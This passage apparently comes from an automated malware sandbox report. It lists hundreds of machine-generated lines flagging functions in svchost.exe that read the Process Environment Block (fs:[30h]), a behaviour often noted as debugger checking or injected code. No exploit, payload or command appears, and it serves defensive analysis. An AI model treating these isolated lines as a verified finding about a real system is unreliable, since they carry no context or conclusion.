            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034347FB mov eax, dword ptr fs:[00000030h]1_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034347FB mov eax, dword ptr fs:[00000030h]1_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D678E mov eax, dword ptr fs:[00000030h]1_2_034D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034307AF mov eax, dword ptr fs:[00000030h]1_2_034307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E47A0 mov eax, dword ptr fs:[00000030h]1_2_034E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344C640 mov eax, dword ptr fs:[00000030h]1_2_0344C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F866E mov eax, dword ptr fs:[00000030h]1_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F866E mov eax, dword ptr fs:[00000030h]1_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A660 mov eax, dword ptr fs:[00000030h]1_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A660 mov eax, dword ptr fs:[00000030h]1_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03462674 mov eax, dword ptr fs:[00000030h]1_2_03462674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE609 mov eax, dword ptr fs:[00000030h]1_2_034AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472619 mov eax, dword ptr fs:[00000030h]1_2_03472619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E627 mov eax, dword ptr fs:[00000030h]1_2_0344E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03466620 mov eax, dword ptr fs:[00000030h]1_2_03466620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03468620 mov eax, dword ptr fs:[00000030h]1_2_03468620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343262C mov eax, dword ptr fs:[00000030h]1_2_0343262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0346A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A6C7 mov eax, dword ptr fs:[00000030h]1_2_0346A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]1_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]1_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]1_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]1_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B06F1 mov eax, dword ptr fs:[00000030h]1_2_034B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B06F1 mov eax, dword ptr fs:[00000030h]1_2_034B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434690 mov eax, dword ptr fs:[00000030h]1_2_03434690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434690 mov eax, dword ptr fs:[00000030h]1_2_03434690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C6A6 mov eax, dword ptr fs:[00000030h]1_2_0346C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034666B0 mov eax, dword ptr fs:[00000030h]1_2_034666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438550 mov eax, dword ptr fs:[00000030h]1_2_03438550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438550 mov eax, dword ptr fs:[00000030h]1_2_03438550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346656A mov eax, dword ptr fs:[00000030h]1_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346656A mov eax, dword ptr fs:[00000030h]1_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346656A mov eax, dword ptr fs:[00000030h]1_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6500 mov eax, dword ptr fs:[00000030h]1_2_034C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440535 mov eax, dword ptr fs:[00000030h]1_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h]1_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E5CF mov eax, dword ptr fs:[00000030h]1_2_0346E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E5CF mov eax, dword ptr fs:[00000030h]1_2_0346E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034365D0 mov eax, dword ptr fs:[00000030h]1_2_034365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A5D0 mov eax, dword ptr fs:[00000030h]1_2_0346A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A5D0 mov eax, dword ptr fs:[00000030h]1_2_0346A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h]1_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034325E0 mov eax, dword ptr fs:[00000030h]1_2_034325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C5ED mov eax, dword ptr fs:[00000030h]1_2_0346C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C5ED mov eax, dword ptr fs:[00000030h]1_2_0346C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03432582 mov eax, dword ptr fs:[00000030h]1_2_03432582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03432582 mov ecx, dword ptr fs:[00000030h]1_2_03432582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03464588 mov eax, dword ptr fs:[00000030h]1_2_03464588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E59C mov eax, dword ptr fs:[00000030h]1_2_0346E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B05A7 mov eax, dword ptr fs:[00000030h]1_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B05A7 mov eax, dword ptr fs:[00000030h]1_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B05A7 mov eax, dword ptr fs:[00000030h]1_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034545B1 mov eax, dword ptr fs:[00000030h]1_2_034545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034545B1 mov eax, dword ptr fs:[00000030h]1_2_034545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h]1_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EA456 mov eax, dword ptr fs:[00000030h]1_2_034EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342645D mov eax, dword ptr fs:[00000030h]1_2_0342645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345245A mov eax, dword ptr fs:[00000030h]1_2_0345245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC460 mov ecx, dword ptr fs:[00000030h]1_2_034BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345A470 mov eax, dword ptr fs:[00000030h]1_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345A470 mov eax, dword ptr fs:[00000030h]1_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345A470 mov eax, dword ptr fs:[00000030h]1_2_0345A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E420 mov eax, dword ptr fs:[00000030h]1_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E420 mov eax, dword ptr fs:[00000030h]1_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E420 mov eax, dword ptr fs:[00000030h]1_2_0342E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C427 mov eax, dword ptr fs:[00000030h]1_2_0342C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h]1_2_034B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034304E5 mov ecx, dword ptr fs:[00000030h]1_2_034304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EA49A mov eax, dword ptr fs:[00000030h]1_2_034EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034364AB mov eax, dword ptr fs:[00000030h]1_2_034364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034644B0 mov ecx, dword ptr fs:[00000030h]1_2_034644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BA4B0 mov eax, dword ptr fs:[00000030h]1_2_034BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E4B4B mov eax, dword ptr fs:[00000030h]1_2_034E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E4B4B mov eax, dword ptr fs:[00000030h]1_2_034E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h]1_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h]1_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h]1_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h]1_2_03502B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6B40 mov eax, dword ptr fs:[00000030h]1_2_034C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6B40 mov eax, dword ptr fs:[00000030h]1_2_034C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FAB40 mov eax, dword ptr fs:[00000030h]1_2_034FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D8B42 mov eax, dword ptr fs:[00000030h]1_2_034D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428B50 mov eax, dword ptr fs:[00000030h]1_2_03428B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DEB50 mov eax, dword ptr fs:[00000030h]1_2_034DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342CB7E mov eax, dword ptr fs:[00000030h]1_2_0342CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504B00 mov eax, dword ptr fs:[00000030h]1_2_03504B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EB20 mov eax, dword ptr fs:[00000030h]1_2_0345EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EB20 mov eax, dword ptr fs:[00000030h]1_2_0345EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F8B28 mov eax, dword ptr fs:[00000030h]1_2_034F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F8B28 mov eax, dword ptr fs:[00000030h]1_2_034F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450BCB mov eax, dword ptr fs:[00000030h]1_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450BCB mov eax, dword ptr fs:[00000030h]1_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450BCB mov eax, dword ptr fs:[00000030h]1_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430BCD mov eax, dword ptr fs:[00000030h]1_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430BCD mov eax, dword ptr fs:[00000030h]1_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430BCD mov eax, dword ptr fs:[00000030h]1_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DEBD0 mov eax, dword ptr fs:[00000030h]1_2_034DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438BF0 mov eax, dword ptr fs:[00000030h]1_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438BF0 mov eax, dword ptr fs:[00000030h]1_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438BF0 mov eax, dword ptr fs:[00000030h]1_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EBFC mov eax, dword ptr fs:[00000030h]1_2_0345EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BCBF0 mov eax, dword ptr fs:[00000030h]1_2_034BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440BBE mov eax, dword ptr fs:[00000030h]1_2_03440BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440BBE mov eax, dword ptr fs:[00000030h]1_2_03440BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E4BB0 mov eax, dword ptr fs:[00000030h]1_2_034E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E4BB0 mov eax, dword ptr fs:[00000030h]1_2_034E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440A5B mov eax, dword ptr fs:[00000030h]1_2_03440A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440A5B mov eax, dword ptr fs:[00000030h]1_2_03440A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346CA6F mov eax, dword ptr fs:[00000030h]1_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346CA6F mov eax, dword ptr fs:[00000030h]1_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346CA6F mov eax, dword ptr fs:[00000030h]1_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DEA60 mov eax, dword ptr fs:[00000030h]1_2_034DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034ACA72 mov eax, dword ptr fs:[00000030h]1_2_034ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034ACA72 mov eax, dword ptr fs:[00000030h]1_2_034ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BCA11 mov eax, dword ptr fs:[00000030h]1_2_034BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346CA24 mov eax, dword ptr fs:[00000030h]1_2_0346CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EA2E mov eax, dword ptr fs:[00000030h]1_2_0345EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03454A35 mov eax, dword ptr fs:[00000030h]1_2_03454A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03454A35 mov eax, dword ptr fs:[00000030h]1_2_03454A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03486ACC mov eax, dword ptr fs:[00000030h]1_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03486ACC mov eax, dword ptr fs:[00000030h]1_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03486ACC mov eax, dword ptr fs:[00000030h]1_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430AD0 mov eax, dword ptr fs:[00000030h]1_2_03430AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03464AD0 mov eax, dword ptr fs:[00000030h]1_2_03464AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03464AD0 mov eax, dword ptr fs:[00000030h]1_2_03464AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346AAEE mov eax, dword ptr fs:[00000030h]1_2_0346AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346AAEE mov eax, dword ptr fs:[00000030h]1_2_0346AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504A80 mov eax, dword ptr fs:[00000030h]1_2_03504A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03468A90 mov edx, dword ptr fs:[00000030h]1_2_03468A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438AA0 mov eax, dword ptr fs:[00000030h]1_2_03438AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438AA0 mov eax, dword ptr fs:[00000030h]1_2_03438AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03486AA4 mov eax, dword ptr fs:[00000030h]1_2_03486AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0946 mov eax, dword ptr fs:[00000030h]1_2_034B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504940 mov eax, dword ptr fs:[00000030h]1_2_03504940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03456962 mov eax, dword ptr fs:[00000030h]1_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03456962 mov eax, dword ptr fs:[00000030h]1_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03456962 mov eax, dword ptr fs:[00000030h]1_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347096E mov eax, dword ptr fs:[00000030h]1_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347096E mov edx, dword ptr fs:[00000030h]1_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347096E mov eax, dword ptr fs:[00000030h]1_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D4978 mov eax, dword ptr fs:[00000030h]1_2_034D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D4978 mov eax, dword ptr fs:[00000030h]1_2_034D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC97C mov eax, dword ptr fs:[00000030h]1_2_034BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE908 mov eax, dword ptr fs:[00000030h]1_2_034AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE908 mov eax, dword ptr fs:[00000030h]1_2_034AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC912 mov eax, dword ptr fs:[00000030h]1_2_034BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428918 mov eax, dword ptr fs:[00000030h]1_2_03428918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428918 mov eax, dword ptr fs:[00000030h]1_2_03428918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B892A mov eax, dword ptr fs:[00000030h]1_2_034B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C892B mov eax, dword ptr fs:[00000030h]1_2_034C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C69C0 mov eax, dword ptr fs:[00000030h]1_2_034C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
